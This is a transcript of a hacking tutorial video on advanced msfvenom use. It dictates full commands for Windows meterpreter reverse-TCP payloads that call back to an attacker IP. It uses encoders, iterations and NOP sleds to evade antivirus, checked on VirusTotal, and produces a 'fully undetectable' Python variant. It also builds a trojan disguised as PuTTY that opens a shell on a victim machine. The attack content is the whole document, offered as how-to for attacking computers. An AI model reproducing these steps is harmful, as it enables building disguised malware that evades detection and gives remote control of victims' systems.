Welcome back. Let's get back to our payload creation. So in the previous videos, we saw how we can create a simple .exe Trojan using msfvenom. We use the basic options where we only set localhost, local port. Now let's just check out some other options that we have available. If I go ahead to my terminal and just type msfvenom-h, this will give us the help menu of msfvenom, and we can see a lot of options into the usage that we have here. And also we have this dash format, this output formats, and use dash list formats to list. So in the previous video we only use the file type which is exe, but we can also use different file types. But to see the available file types, you can just type msfvenom. I'd say it's right here, dash list formats, dash list formats, and this will give us the file formats that we have available for msfvenom. You can see we have bash, C, C#, Go, Java, the Perl, the PowerShell, the Python, Ruby, and so many things. So we can use different file types for all the file formats if you want to execute different operating systems. And for this particular video, we are going to create two payloads, and we are going to compare these two payloads in a website called VirusTotal. And the way we are going to compare is whether they will be detected by antivirus vendors or not. And first, but let me go check and open the VirusTotal website. The first payload will be the basic payload that we created previously, and the second payload will be something that will be less detectable by antivirus vendors, and we will see the different options that we have. But first, let me open the website. So VirusTotal.com. Okay, so this is the website, and we will upload the payloads that we create here. And first, we just open the help menu of the msfvenom, and we will use different options that we have right here to create our payload. But first, let's create the first payload, which is the payload that we created previously, which is Windows x64 /reverse_tcp lhost. Lhost is going to be our Kali Linux IP address, and let me check my IP address. ifconfig. So this is our IP address, and let me get back to my Kali Linux mission to create our payload. 249 and all port, which is going to be 555, but you can choose whatever port number. And after that, -f, which is going to be that .exe file, which is the file format, and -o, which is going to give you the output name, and let's call it shell.exe. So let me check the spellings if they are correct or not. Windows x64 interpreter reverse TCP lhost 192.168.88.249. L port is going to be 5555, and the file type exe, and the output name is going to be shell.exe. So I'm going to press enter, and let's see if it's done or not, and let's wait for it. Okay, I think we didn't create it. Let's try to make sudo. Okay, if I type ls, okay, our payload is created right here, and let's try to upload it to VirusTotal and see how many antivirus vendors will detect this. So I'm gonna choose file, I'm gonna go to my home, open it. confirm upload. Robot. This is the reCAPTCHA. Curse, okay, this one. Okay, it's gonna detect for whether it's undetectable or not. While this is working, let's create our second payload, and we will use the different options that we have. Okay, let me increase the size of this. Press Ctrl L. So if I did, sorry, let me get back to this. Okay, we're just gonna use the same command, but for this we are just gonna add the -a, which is for architecture. This will choose whether it's 64-bit or 32-bit. So I'm gonna choose 64-bit. And another option that we have is the -e, which is for encoders. So let's see what this encoders does. So this is the option that we have. So the encoders to use -list encoders to list. So this will try to be less detectable by antivirus that we have. And to see the available encoders that we have, we can just type msfvenom -list encoders, and this will give us the list, a bunch of lists of encoders that we have. And we can see that we have, let me scroll all the way up, we have different encoders right here, which is for the CMD, for the Unix, which is a bash brace expansion command encoders. But what we want is for the x64, because we choose the architecture to be x64. And let me choose this one right here, which is x64 Zor dynamic. So I'm gonna copy it and I'm gonna paste it right here. Another option that we have is for -i, which is for the iterations. So let me get back to the help menu of msfvenom. Let me just type the command here. For the I, this is the options, the iterations, which count the number of times to encode the payload. This will be the number of times that the encoders will be encoded. So let's choose 15. I think 15 is enough. So the more the iteration, the bigger the payload will be in size, and this means that it might be less detectable to antivirus vendors. And another option that we have is --platform, which is going to be Windows, and also -n, which is going to be 500. And let's see what the -n is. Where is it? This is the knob sled, which is prepend a knob sled of length and size on the payload. So in the previous videos, we know what knob is. A knob is an instruction which tells the process not to do anything. For this, so let's give it 500. And of course, -f is going to be exe, and -o is going to be shell 1.exe. Let's give it shell 2.exe. So this is the type of options or available options that we have that we can use to, make less detectable to antivirus vendors. We have the -a for architecture, the -e for encoders, -i for eternity. This is for number of times the encoders will be encoded. --platform, which is for the platform you are going to attack, Windows. -n for knobs, -a for the file type, and -o for the output. So I'm going to press enter here, and let's wait for our another payload to be done. While this is getting done, let's check for the first our payload what we got from antivirus detectors. So we got the score right here, 53 of 71. These are the rates are the ones who are detected by antivirus detectors. For example, the AVG was detected, and they are not detected by Baidu, Kingsoft, and so many things. And don't forget the number right here. It gave us 3 of 71, and we're gonna also check with the second payload that we created. So let me get back to my terminal right here and say whether it's done or not. Okay, our second payload is created. Let's go back again to our VirusTotal website, and don't forget, by the way, don't forget this score. It gave us 53 out of 71. And let's upload another shell, which is our second payload right here. Confirm upload. Okay, I'm not a robot. Okay, let's do it again. Shell 2, open, confirm upload. It's uploading and uploading. Okay. As I have said, most of these payloads are more detectable by antivirus vendors because msfvenom is a very known tool. But as you can see here, it gave us 51 up to 72, but in the previous videos it was detected by 53, but we managed to narrow it down to 51. So we successfully make our payload less detectable by antivirus vendors. But if you want to create a fully inductive payload, you have to change the file type. So in the previous videos we only used the .exe file, and if you want to use some other file types, you can use their options as well. So let us create this one here with the same thing, but for the file type, let's change it to Python. And for the name, we have to change the name, which is Python underscore payload -tp.py because it is a Python file. So I'm gonna press enter. Okay, it's done. And let's check in the VirusTotal website whether it can be detectable or not. And of course, this will be less detectable because we have created another file type, which is the Python. Okay, verify here also. Verify. Okay, let's upload our payload. Okay, let's upload our payload. So if I go ahead and upload it, okay, it's analyzing this one. As you can see right now, it's not being detected at all right now as soon as it is in this person's, because we have created a file type that is in Python. So this is a fully undetectable payload or a FUD, but this will not be good for you if for for hacking, especially for Windows, because in Windows machine Python is not installed by default, so it will be hard to execute that payload. But as you can see here, if you change the file type, it will be less detectable. Okay, great. We covered msfvenom and some of its options. I advise you to experiment even more with the msfvenom. For example, you can start creating other payloads if you want. In the previous videos, we only created a Windows payload, but if you have a Linux, Mac OS machines that you want to attack, you can generate payload for those operating systems as well. To check out all the available payloads you can create, you can just type the command msfvenom -- list payloads. So let me show you right here. I'm gonna clear this. So msfvenom -- list payloads. It will give us the list of payloads that can use. Okay, great. These are the available payloads that you can use to attack. As you can see, we have for the Windows, but if I scroll all the way up, yeah, I have for Linux right here, for Java, for the CMD, and so many things. Okay, alright. So the next step, we're going to create a payload that looks like another legitimate software. So that means we are going to create a Trojan. Before you start creating our payload, first go into Party and download either is 64 or is 32-bit. So what we are going to do is we are going to make look our payload look like a party.exe. Alright, so msfvenom, okay, sorry, you have to put sudo msfvenom-p Windows, since it's a Windows machine, x64-bit meter slash reverse underscore TCP, and all host, we're going to set our host to our attack box, which is going to be this one, that 249, and airport, which is I'm going to choose 555-X, which is a template. And to look like, and to check out what template is, just type msf venom-h. We're going to use this -x, which is a template, and this means it specifies a custom xtp file template. So you're gonna use another template to like our payload, and for that we are going to use party.exe -f is going to be the exe -o is going to be capital pt party.exe. All right, so I'm gonna press enter. Okay, our payload is created. Let's check it. Here it is, party with a capital P. So after that, we are going to download it to our victim box. And I've already done it mine, but you can choose whatever platform to download it to your victim box. And after that, what we are going to do is we are going to create a listener with MSF console. And I've already did mine. Let's exit from here. And as you can see, when you open it, set all the L hosts in the L port, and after that click run, and as you can see, this is the icon of Patty, and the difference is you can see that it is capital P, not small letter p, but the real original software of Patty is with small letter p, but it's our Trojan or our payload to look like Patty software. So I'm gonna click run, and let me get back to my meta. Okay, it created a shell again. I type ls and get uid, sorry, get uid. As you can see here, it says my name ulsfhp. So this was our part in advanced usage of msfvenom, and I hope to see you in the next video, and don't forget to subscribe and like. See you then.